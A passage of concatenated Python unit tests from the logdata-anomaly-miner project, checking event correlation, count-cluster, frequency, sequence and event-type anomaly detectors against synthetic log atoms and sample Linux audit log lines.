[self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.errored_data_diff5[:12000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.errored_data_diff1[:12000]) def test4learn_from_examples_with_errors_and_smaller_probabilities(self): """ In this test case examples with errors are used, but still should be learned. These tests are using a higher generation_probability and generation_factor, because the data contains errors. """ description = 'test4eventCorrelationDetectorTest' ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.7, generation_factor=0.99, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:25000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.7, generation_factor=0.99, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:25000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.95, learn_mode=True) self.analysis_context.register_component(ecd, description + '3') self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:40000]) ecd = EventCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, generation_probability=0.5, generation_factor=0.95, learn_mode=True) self.analysis_context.register_component(ecd, description + '4') self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:40000]) def test5learn_safe_assumptions(self): """ In this test case p0 and alpha are chosen carefully to only find safe assumptions about the implications in the data. Therefor more iterations in the training phase are needed. """ description = 'test5eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.perfect_data_diff5[:20000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.errored_data_diff5_low_error_rate[:40000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.analysis_context.register_component(ecd, description + '3') self.run_ecd_test(ecd, self.perfect_data_diff1[:20000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=1.0, alpha=0.01, learn_mode=True) self.analysis_context.register_component(ecd, description + '4') self.run_ecd_test(ecd, self.errored_data_diff1_low_error_rate[:40000]) def test6approximately_learn_implications(self): """ In this unittest p0 and alpha are chosen to approximately find sequences in log data. Therefor not as many iterations are needed to learn the rules. """ description = 'test6eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description) self.run_ecd_test(ecd, self.perfect_data_diff5[:10000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description + '2') self.run_ecd_test(ecd, self.errored_data_diff5[:10000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description + '3') self.run_ecd_test(ecd, self.perfect_data_diff1[:10000]) ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description + '4') self.run_ecd_test(ecd, self.errored_data_diff1[:10000]) def test7constraint_list(self): """Test the allowlisting of paths.""" description = 'test7eventCorrelationDetectorTest' ecd = EventCorrelationDetector( self.aminer_config, [self.stream_printer_event_handler], check_rules_flag=True, p0=0.7, alpha=0.1, learn_mode=True) self.analysis_context.register_component(ecd, description) self.assertEqual([], ecd.constraint_list) match_context_fixed_dme = MatchContext(b' pid=') fixed_dme = FixedDataModelElement('s1', b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) # unknown path ecd.allowlist_event(self.analysis % ecd.__class__.__name__, match_element_fixed_dme.get_path(), None) self.assertEqual(['/s1'], ecd.constraint_list) # known path ecd.allowlist_event(self.analysis % ecd.__class__.__name__, match_element_fixed_dme.get_path(), None) self.assertEqual(['/s1'], ecd.constraint_list) def check_rules(self, sorted_back_rules, sorted_forward_rules, diff): """Check if the rules are as expected.""" for path in sorted_forward_rules: self.assertEqual(len(sorted_forward_rules[path]), 5 / diff) implications = [] trigger = b'' for rule in sorted_forward_rules[path]: trigger = rule.trigger_event[0].split('/')[-1].encode() implications.append(self.alphabet.index(rule.implied_event[0].split('/')[-1].encode())) for i in range(1, len(sorted_forward_rules[path]), 1): # skipcq: PTC-W0060 self.assertIn((self.alphabet.index(trigger) + i) % len(self.alphabet), implications) for path in sorted_back_rules: self.assertEqual(len(sorted_back_rules[path]), 5 / diff) trigger = b'' implications = [] for rule in sorted_back_rules[path]: trigger = rule.trigger_event[0].split('/')[-1].encode() implications.append(self.alphabet.index(rule.implied_event[0].split('/')[-1].encode())) for i in range(1, len(sorted_back_rules[path]), 1): # skipcq: PTC-W0060 self.assertIn((self.alphabet.index(trigger) - i) % len(self.alphabet), implications) def check_anomaly_detection(self, ecd, t, diff): """Check if anomalies were detected as expected.""" for char in self.alphabet: self.reset_output_stream() char = bytes([char]) parser_match = ParserMatch(self.alphabet_model.get_match_element('parser', MatchContext(char))) t += 5 * 3 ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)) # another LogAtom must be received to check the follow anomalies. t += 5 * 3 ecd.receive_atom(LogAtom(char, parser_match, t, self.__class__.__name__)) # precede anomaly for i in range(1, int(5 / diff) + 1, 1): self.assertIn('Event %s is missing, but should precede event %s' % ( repr(bytes([self.alphabet[(self.alphabet.index(char) - i) % len(self.alphabet)]])), repr(char)), self.output_stream.getvalue()) for i in range(int(5 / diff) + 1, len(self.alphabet), 1): # skipcq: PTC-W0060 self.assertNotIn('Event %s is missing, but should precede event %s' % ( repr(bytes([self.alphabet[(self.alphabet.index(char) - i) % len(self.alphabet)]])), repr(char)), self.output_stream.getvalue()) # follow anomaly for i in range(1, int(5 / diff) + 1, 1): self.assertIn('Event %s is missing, but should follow event %s' % ( repr(bytes([self.alphabet[(self.alphabet.index(char) + i) % len(self.alphabet)]])), repr(char)), self.output_stream.getvalue()) for i in range(int(5 / diff) + 1, len(self.alphabet), 1): # skipcq: PTC-W0060 self.assertNotIn('Event %s is missing, but should follow event %s' % ( repr(bytes([self.alphabet[(self.alphabet.index(char) + i) % len(self.alphabet)]])), repr(char)), self.output_stream.getvalue()) def run_ecd_test(self, ecd, log_atoms): """Run the ECD test.""" diff = log_atoms[1].atom_time - log_atoms[0].atom_time log_atom = None for log_atom in log_atoms: ecd.receive_atom(log_atom) sorted_forward_rules = dict(sorted(ecd.forward_rules.items())) sorted_back_rules = dict(sorted(ecd.back_rules.items())) self.assertEqual(len(sorted_forward_rules), len(self.alphabet_model.children)) self.assertEqual(len(sorted_back_rules), len(self.alphabet_model.children)) self.check_rules(sorted_back_rules, sorted_forward_rules, diff) ecd.learn_mode = False self.check_anomaly_detection(ecd, log_atom.atom_time, diff) def generate_perfect_data(self, iterations, diff): """Generate data without any error.""" log_atoms = [] t = time() for i in range(1, iterations+1): char = bytes([self.alphabet[i % len(self.alphabet)]]) parser_match = ParserMatch(self.alphabet_model.get_match_element('parser', MatchContext(char))) t += diff log_atoms.append(LogAtom(char, parser_match, t, self.__class__.__name__)) return log_atoms def generate_errored_data(self, iterations, diff, error_rate): """Generate data with errors according to the error_rate.""" log_atoms = [] t = time() divisor = 1 while error_rate * divisor < 1: divisor = divisor * 10 err = divisor * error_rate divisor //= err for i in range(1, iterations+1): if i % divisor == 0 and i != 0: char = bytes([self.alphabet[int(i + random.uniform(diff+1, len(self.alphabet))) % len(self.alphabet)]]) else: char = bytes([self.alphabet[i % len(self.alphabet)]]) parser_match = ParserMatch(self.alphabet_model.get_match_element('parser', MatchContext(char))) t += diff log_atoms.append(LogAtom(char, parser_match, t, self.__class__.__name__)) return log_atoms if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventCountClusterDetectorTest.py000066400000000000000000000160051437606560100321510ustar00rootroot00000000000000import unittest from aminer.analysis.EventCountClusterDetector import EventCountClusterDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomalies = [] # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomalies.append(evdat) class EventCountClusterDetectorTest(TestBase): """Unittests for the EventFrequencyDetector.""" def test1_normal_count_detection(self): """ This test checks the normal operation of the ECCD """ description = "Test1EventFrequencyDetector" # Initialize detector for analyzing values in one path in time windows of 10 seconds test_handler = TestHandler() eccd = EventCountClusterDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[test_handler], target_path_list=['/p/value'], id_path_list=['/p/id'], window_size=10, num_windows=50, confidence_factor=0.5, idf=True, norm=False, add_normal=False, check_empty_windows=False, persistence_id='Default', learn_mode=True, output_logline=False) self.analysis_context.register_component(eccd, description) # The following log atoms are created: # window 1: # value a: 1 time by x, 1 time by y # value b: 1 time by x # window 2: # value a: 2 times by x, 1 time by y # value b: 1 time by x # window 3: # value b: 1 time by x # value c: 1 time by x # window 4: # value a: 1 time by x # Start of window 1: m1_1 = MatchElement('/p/value', b'a', b'a', None) m1_2 = MatchElement('/p/id', b'x', b'x', None) p1 = ParserMatch(MatchElement('/p', b'ax', b'ax', [m1_1, m1_2])) log_atom_1 = LogAtom(b'ax', p1, 1, None) m2_1 = MatchElement('/p/value', b'a', b'a', None) m2_2 = MatchElement('/p/id', b'y', b'y', None) p2 = ParserMatch(MatchElement('/p', b'ay', b'ay', [m2_1, m2_2])) log_atom_2 = LogAtom(b'ay', p2, 2, None) m3_1 = MatchElement('/p/value', b'b', b'b', None) m3_2 = MatchElement('/p/id', b'x', b'x', None) p3 = ParserMatch(MatchElement('/p', b'bx', b'bx', [m3_1, m3_2])) log_atom_3 = LogAtom(b'bx', p3, 3, None) # Start of window 2: m4_1 = MatchElement('/p/value', b'a', b'a', None) m4_2 = MatchElement('/p/id', b'x', b'x', None) p4 = ParserMatch(MatchElement('/p', b'ax', b'ax', [m4_1, m4_2])) log_atom_4 = LogAtom(b'ax', p4, 13, None) m5_1 = MatchElement('/p/value', b'a', b'a', None) m5_2 = MatchElement('/p/id', b'y', b'y', None) p5 = ParserMatch(MatchElement('/p', b'ay', b'ay', [m5_1, m5_2])) log_atom_5 = LogAtom(b'ay', p5, 14, None) m6_1 = MatchElement('/p/value', b'b', b'b', None) m6_2 = MatchElement('/p/id', b'x', b'x', None) p6 = ParserMatch(MatchElement('/p', b'bx', b'bx', [m6_1, m6_2])) log_atom_6 = LogAtom(b'bx', p6, 15, None) m7_1 = MatchElement('/p/value', b'a', b'a', None) m7_2 = MatchElement('/p/id', b'x', b'x', None) p7 = ParserMatch(MatchElement('/p', b'ax', b'ax', [m7_1, m7_2])) log_atom_7 = LogAtom(b'ax', p4, 16, None) # Start of window 3: m8_1 = MatchElement('/p/value', b'c', b'c', None) m8_2 = MatchElement('/p/id', b'x', b'x', None) p8 = ParserMatch(MatchElement('/p', b'cx', b'cx', [m8_1, m8_2])) log_atom_8 = LogAtom(b'cx', p8, 23, None) m9_1 = MatchElement('/p/value', b'b', b'b', None) m9_2 = MatchElement('/p/id', b'x', b'x', None) p9 = ParserMatch(MatchElement('/p', b'bx', b'bx', [m9_1, m9_2])) log_atom_9 = LogAtom(b'bx', p9, 24, None) # Start of window 4: m10_1 = MatchElement('/p/value', b'a', b'a', None) m10_2 = MatchElement('/p/id', b'x', b'x', None) p10 = ParserMatch(MatchElement('/p', b'ax', b'ax', [m10_1, m10_2])) log_atom_10 = LogAtom(b'ax', p10, 43, None) # Forward log atoms to detector eccd.receive_atom(log_atom_1) self.assertFalse(test_handler.anomalies) eccd.receive_atom(log_atom_2) self.assertFalse(test_handler.anomalies) eccd.receive_atom(log_atom_3) self.assertFalse(test_handler.anomalies) eccd.receive_atom(log_atom_4) # End of first time window; first count vector triggers anomaly for x self.assertTrue(test_handler.anomalies) # Remove anomaly test_handler.anomalies = [] eccd.receive_atom(log_atom_5) # End of first time window; first count vector triggers anomaly for y self.assertTrue(test_handler.anomalies) # Remove anomaly test_handler.anomalies = [] eccd.receive_atom(log_atom_6) self.assertFalse(test_handler.anomalies) eccd.receive_atom(log_atom_7) self.assertFalse(test_handler.anomalies) eccd.receive_atom(log_atom_8) # No anomaly reported for x since 2 times a and 1 time b (window 1) is similar enough to 1 time a and 1 time b (window 2) self.assertFalse(test_handler.anomalies) eccd.receive_atom(log_atom_9) self.assertFalse(test_handler.anomalies) eccd.receive_atom(log_atom_10) # Check learned count vectors at end of third time window # For x, count vector from first and third windows are included in model; for y only first window self.assertEquals(eccd.known_counts, {('x',): [{('a',): 1, ('b',): 1}, {('c',): 1, ('b',): 1}], ('y',): [{('a',): 1}]}) # Since a occurs in both x and y, its idf factor is only 0.176 (=log10(3/2)), # compared to b and c which have an idf factor of 0.477 (=log10(3/1)). # Comparing the count vectors for x in the first and third window, we see that # a occurs only in first window, which increases diff to 0.176/0.176 # b occurs once in first and third windows, which updates diff to 0.176/0.653 # c occurs only in third window, which increaes diff to 0.653/1.13 # The final score is thus 0.653/1.13=0.578, which exceeds the threshold of 0.5. self.assertEqual(test_handler.anomalies, [ {'AnalysisComponent': {'AffectedLogAtomPaths': ['/p/value'], 'AffectedLogAtomFrequencies': [1, 1], 'AffectedIdValues': ['x'], 'AffectedLogAtomValues': [('c',), ('b',)]}, 'CountData': { 'ConfidenceFactor': 0.5, 'Confidence': 0.577893478883737 }}]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventFrequencyDetectorTest.py000066400000000000000000000226471437606560100314710ustar00rootroot00000000000000import unittest from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomalies = [] # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomalies.append(evdat) class EventFrequencyDetectorTest(TestBase): """Unittests for the EventFrequencyDetector.""" def test1_normal_frequency_detection(self): """ This test case checks the normal detection of new frequencies. The EFD is used with one path to be analyzed over four time windows. The frequencies do not change a lot in the first time windows, thus no anomalies are generated. Then, value frequencies change and anomalies are created in the last time windows. """ description = "Test1EventFrequencyDetector" # Initialize detector for analyzing values in one path in time windows of 10 seconds test_handler = TestHandler() event_frequency_detector = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[test_handler], target_path_list=['/value'], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, persistence_id='Default', learn_mode=True, output_logline=False) self.analysis_context.register_component(event_frequency_detector, description) # Prepare log atoms that represent different amounts of values a, b over time # Four time windows are used. The first time window is used for initialization. The # second time window represents normal behavior, i.e., the frequencies do not change # too much and no anomalies should be generated. The third window contains changes # of value frequencies and thus anomalies should be generated. The fourth time window # only has the purpose of marking the end of the third time window. # The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 3 times # value b: 1 time # window 3: # value a: 0 times # value b: 2 times # window 4: # value a: 1 time # Start of window 1: m_1 = MatchElement('/value', b'a', b'a', None) parser_match_1 = ParserMatch(m_1) log_atom_1 = LogAtom(b'a', parser_match_1, 1, None) m_2 = MatchElement('/value', b'b', b'b', None) parser_match_2 = ParserMatch(m_2) log_atom_2 = LogAtom(b'b', parser_match_2, 3, None) m_3 = MatchElement('/value', b'a', b'a', None) parser_match_3 = ParserMatch(m_3) log_atom_3 = LogAtom(b'a', parser_match_3, 7, None) # Start of window 2: m_4 = MatchElement('/value', b'a', b'a', None) parser_match_4 = ParserMatch(m_4) log_atom_4 = LogAtom(b'a', parser_match_4, 13, None) m_6 = MatchElement('/value', b'b', b'b', None) parser_match_6 = ParserMatch(m_6) log_atom_6 = LogAtom(b'b', parser_match_6, 17, None) m_7 = MatchElement('/value', b'a', b'a', None) parser_match_7 = ParserMatch(m_7) log_atom_7 = LogAtom(b'a', parser_match_7, 18, None) m_8 = MatchElement('/value', b'a', b'a', None) parser_match_8 = ParserMatch(m_8) log_atom_8 = LogAtom(b'a', parser_match_8, 19, None) # Start of window 3: m_9 = MatchElement('/value', b'b', b'b', None) parser_match_9 = ParserMatch(m_9) log_atom_9 = LogAtom(b'b', parser_match_9, 25, None) m_10 = MatchElement('/value', b'b', b'b', None) parser_match_10 = ParserMatch(m_10) log_atom_10 = LogAtom(b'b', parser_match_10, 25, None) # Start of window 4: m_11 = MatchElement('/value', b'a', b'a', None) parser_match_11 = ParserMatch(m_11) log_atom_11 = LogAtom(b'a', parser_match_11, 35, None) # Forward log atoms to detector # Log atoms of initial window 1 should not create anomalies and add to counts # Input: a; initial time window is started # Expected output: frequency of a is 1 event_frequency_detector.receive_atom(log_atom_1) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [1]}) # Input: b; initial time window is not finished # Expected output: frequency of b is 1 added to existing count event_frequency_detector.receive_atom(log_atom_2) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [1], ('b',): [1]}) # Input: a; initial time window is not finished # Expected output: frequency of a is 2 replaces a in existing count event_frequency_detector.receive_atom(log_atom_3) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [2], ('b',): [1]}) # Time window 2 should not create anomalies since a is in confidence (3 vs 2 occurrences) and b is identical (1 occurrence). # Input: a; initial time window is completed, second time window is started # Expected output: frequency of a is 1 in new time window count, old count remains unchanged event_frequency_detector.receive_atom(log_atom_4) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [2, 1], ('b',): [1, 0]}) # Input: b; second time window is not finished # Expected output: frequency of b is 1 in new time window count, old count remains unchanged event_frequency_detector.receive_atom(log_atom_6) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [2, 1], ('b',): [1, 1]}) # Input: a; second time window is not finished # Expected output: frequency of a is 3 in new time window count, old count remains unchanged event_frequency_detector.receive_atom(log_atom_7) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [2, 2], ('b',): [1, 1]}) # Input: a; second time window is not finished # Expected output: frequency of a is 4 in new time window count, old count remains unchanged event_frequency_detector.receive_atom(log_atom_8) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [2, 3], ('b',): [1, 1]}) # Time window 3 should create 2 anomalies since a drops from 3 to 0 and b increases from 1 to 2, which will be reported in window 4. # Anomalies are only reported when third time window is known to be completed, which will occur when subsequent atom is received. # Input: b; second time window is completed, third time window is started # Expected output: frequency of b is 1 in new time window count, old count remains unchanged event_frequency_detector.receive_atom(log_atom_9) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [2, 3, 0], ('b',): [1, 1, 1]}) # Input: b; third ime window is not finished # Expected output: frequency of b is 2 in new time window count, old count remains unchanged event_frequency_detector.receive_atom(log_atom_10) self.assertFalse(test_handler.anomalies) self.assertEqual(event_frequency_detector.counts, {('a',): [2, 3, 0], ('b',): [1, 1, 2]}) # Time window 4 should not create anomalies since no log atom is received to evaluate it. # Input: a; third time window is completed, fourth time window is started # Expected output: Anomalies for unexpected low counts of a (0 instead of 3) and b (2 instead of 1), frequency of a is 1 in new # time window count, old count remains unchanged event_frequency_detector.receive_atom(log_atom_11) self.assertEqual(test_handler.anomalies, [ {'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': ['a']}, 'FrequencyData': { 'ExpectedLogAtomValuesFrequency': 3.0, 'ExpectedLogAtomValuesFrequencyRange': [1.0, 5.0], 'LogAtomValuesFrequency': 0, 'WindowSize': 10, 'ConfidenceFactor': 0.51, 'Confidence': 1.0 }}, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/value'], 'AffectedLogAtomValues': ['b']}, 'FrequencyData': {'ExpectedLogAtomValuesFrequency': 1.0, 'ExpectedLogAtomValuesFrequencyRange': [1.0, 1.0], 'LogAtomValuesFrequency': 2, 'WindowSize': 10, 'ConfidenceFactor': 0.51, 'Confidence': 0.5}}]) self.assertEqual(event_frequency_detector.counts, {('a',): [3, 0, 1], ('b',): [1, 2, 0]}) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventSequenceDetectorTest.py000066400000000000000000000140031437606560100312630ustar00rootroot00000000000000import unittest from aminer.analysis.EventSequenceDetector import EventSequenceDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase class TestHandler(): """Dummy anomaly handler.""" def __init__(self): self.anomaly = None # skipcq: PYL-W0613 def receive_event(self, name, msg, ll, evdat, atom, obj): """Receive anomaly information.""" self.anomaly = evdat class EventSequenceDetectorTest(TestBase): """Unittests for the EventSequenceDetectorDetector.""" def test1_normal_sequence_detection(self): """ This test case checks the normal detection of new sequences. The ESD is used to detect value sequences of length 2 and uses one id path to cope with interleaving sequences, i.e., the sequences only make sense when logs that contain the same id are considered. """ description = "Test1EventSequenceDetector" # Initialize detector for sequence length 2 test_handler = TestHandler() event_sequence_detector = EventSequenceDetector(self.aminer_config, [test_handler], ['/model/id'], ['/model/value'], 2, False, -1, 'Default', True, output_logline=False) self.analysis_context.register_component(event_sequence_detector, description) # Prepare log atoms that represent two users (id) that produce interleaved sequence a, b, c # This means, user with id 1 creates sequence a, b, c, and user with id 2 creates sequence # a, b, however, these sequences are interleaved. The ESD resolves this issue using the id # as an id path (/model/id). The path of the values is /model/value. # The following events are generated: # id: 1 value: a # id: 1 value: b # id: 2 value: a # id: 1 value: c # id: 2 value: b m_1 = MatchElement('/model/id', b'1', b'1', None) m_2 = MatchElement('/model/value', b'a', b'a', None) match_element_1 = MatchElement('/model', b'1a', b'1a', [m_1, m_2]) parser_match_1 = ParserMatch(match_element_1) log_atom_1 = LogAtom(b'1a', parser_match_1, 1, None) m_3 = MatchElement('/model/id', b'1', b'1', None) m_4 = MatchElement('/model/value', b'b', b'b', None) match_element_2 = MatchElement('/model', b'1b', b'1b', [m_3, m_4]) parser_match_2 = ParserMatch(match_element_2) log_atom_2 = LogAtom(b'1b', parser_match_2, 2, None) m_5 = MatchElement('/model/id', b'2', b'2', None) m_6 = MatchElement('/model/value', b'a', b'a', None) match_element_3 = MatchElement('/model', b'2a', b'2a', [m_5, m_6]) parser_match_3 = ParserMatch(match_element_3) log_atom_3 = LogAtom(b'2a', parser_match_3, 3, None) m_7 = MatchElement('/model/id', b'1', b'1', None) m_8 = MatchElement('/model/value', b'c', b'c', None) match_element_4 = MatchElement('/model', b'1c', b'1c', [m_7, m_8]) parser_match_4 = ParserMatch(match_element_4) log_atom_4 = LogAtom(b'1c', parser_match_4, 4, None) m_9 = MatchElement('/model/id', b'2', b'2', None) m_10 = MatchElement('/model/value', b'b', b'b', None) match_element_5 = MatchElement('/model', b'2b', b'2b', [m_9, m_10]) parser_match_5 = ParserMatch(match_element_5) log_atom_5 = LogAtom(b'2b', parser_match_5, 5, None) # Forward log atoms to detector # Since sequence length is 2, first atom should not have any effect # Input: id: 1 value: a # Expected output: None event_sequence_detector.receive_atom(log_atom_1) self.assertIsNone(test_handler.anomaly) sequences_set = set() self.assertEqual(event_sequence_detector.sequences, sequences_set) # Second log atom should create first sequence # Input: id: 1 value: b # Expected output: New sequence (a, b) detected, added to known sequences event_sequence_detector.receive_atom(log_atom_2) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [('a',), ('b',)], 'AffectedIdValues': ['1']}}) sequences_set.add((('a',), ('b',))) self.assertEqual(event_sequence_detector.sequences, sequences_set) test_handler.anomaly = None # Next log atom is of different user, should not have any effect # Input: id: 2 value: a # Expected output: None event_sequence_detector.receive_atom(log_atom_3) self.assertIsNone(test_handler.anomaly) self.assertEqual(event_sequence_detector.sequences, sequences_set) # Next log atom is of user with id 1, but new value c, thus new sequence should be generated # Input: id: 1 value: c # Expected output: New sequence (b, c) detected, added to known sequences event_sequence_detector.receive_atom(log_atom_4) self.assertEqual(test_handler.anomaly, {'AnalysisComponent': {'AffectedLogAtomPaths': ['/model/value'], 'AffectedLogAtomValues': [('b',), ('c',)], 'AffectedIdValues': ['1']}}) sequences_set.add((('b',), ('c',))) self.assertEqual(event_sequence_detector.sequences, sequences_set) test_handler.anomaly = None # Next log atom is of user with id 2, but sequence a, b is already known from user with id 1, thus no effect # Input: id: 2 value: b # Expected output: None event_sequence_detector.receive_atom(log_atom_5) self.assertIsNone(test_handler.anomaly) self.assertEqual(event_sequence_detector.sequences, sequences_set) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/analysis/EventTypeDetectorTest.py000066400000000000000000000357141437606560100304500ustar00rootroot00000000000000import time import unittest from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase class EventTypeDetectorTest(TestBase): """Unittests for the EventTypeDetector.""" log_lines = [ b'type=SYSCALL msg=audit(1580367384.000:1): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367385.000:1): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367386.000:2): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367387.000:2): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.000:3): arch=c000003e syscall=3 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367389.000:3): item=0 name="three" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367388.500:100): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1' b' ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=SYSCALL msg=audit(1580367390.000:4): arch=c000003e syscall=1 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" exe="/usr/sbin/apache2" key=(null)', b'type=PATH msg=audit(1580367391.000:4): item=0 name="one" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=PATH msg=audit(1580367392.000:5): item=0 name="two" inode=790106 dev=fe:01 mode=0100666 ouid=1000 ogid=1000 rdev=00:00 ' b'nametype=NORMAL', b'type=SYSCALL msg=audit(1580367393.000:5): arch=c000003e syscall=2 success=yes exit=21 a0=7ffda5863060 a1=0 a2=1b6 a3=4f items=1 ' b'ppid=22913 pid=13187 auid=4294967295 uid=33 gid=33 euid=33 suid=33 fsuid=33 egid=33 sgid=33 fsgid=33 tty=(none) ses=4294967295 ' b'comm="apache2" 